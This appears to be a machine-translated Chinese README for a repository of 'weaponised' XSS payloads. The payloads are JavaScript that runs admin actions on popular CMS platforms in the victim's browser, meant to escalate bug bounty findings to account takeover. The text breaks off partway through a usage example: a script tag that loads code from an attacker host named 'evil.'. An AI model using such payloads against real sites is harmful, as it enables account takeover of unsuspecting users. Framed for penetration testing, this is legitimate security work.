weaponised-XSS-payloads:XSS有效载荷旨在将Alert（1）转换为P1

武器化的XSS有效负载 XSS有效载荷旨在将alert（1）转换为P1。 博客文章 此回购与博客文章“如何将XSS Bug从中等升级到关键”一起发布， 这是什么？ 在此存储库中，您将找到一堆JavaScript文件，可以将这些文件加载​​到XSS有效负载中，以便在受害人浏览器的上下文中在流行的CMS平台上执行敏感功能。 这可以帮助将一个普通的旧XSS错误链接到更重要的内容中，例如帐户收购。 这是通过演示实际的安全影响来增强渗透测试或漏洞赏金报告的严重性的理想选择。 我有时间的话，就会慢慢增加有效载荷。 如果您能提供帮助，还会有更多其他产品-欢迎提出要求！ 如果您在寻找创作灵感，请在此仓库中选择“问题”标签。 如何 使用这些有效负载的最简单方法是将它们托管在某个地方，然后将其加载到XSS有效负载的脚本标签的src属性中，如下所示： <script src="http://evil.